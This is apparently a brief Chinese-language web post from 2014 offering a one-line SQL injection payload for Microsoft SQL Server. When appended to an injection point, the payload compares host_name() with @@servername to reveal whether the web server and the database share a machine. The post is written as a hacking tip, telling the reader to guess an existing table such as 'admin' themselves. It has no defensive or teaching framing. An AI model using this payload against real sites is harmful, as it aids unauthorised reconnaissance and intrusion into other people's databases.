日期:2014-05-16  浏览次数:20446 次

一句话判断数据库是否web和数据库分离

and exists(select * from admin where 1=(SELECT (case when host_name()
=@@servername then 1 else 0 end)))

加在注入点后面,如果返回正常说明web和数据库是同一服务器,如果不正常责说明是分离的.
注意admin是数据库存在的一个表,自己找吧.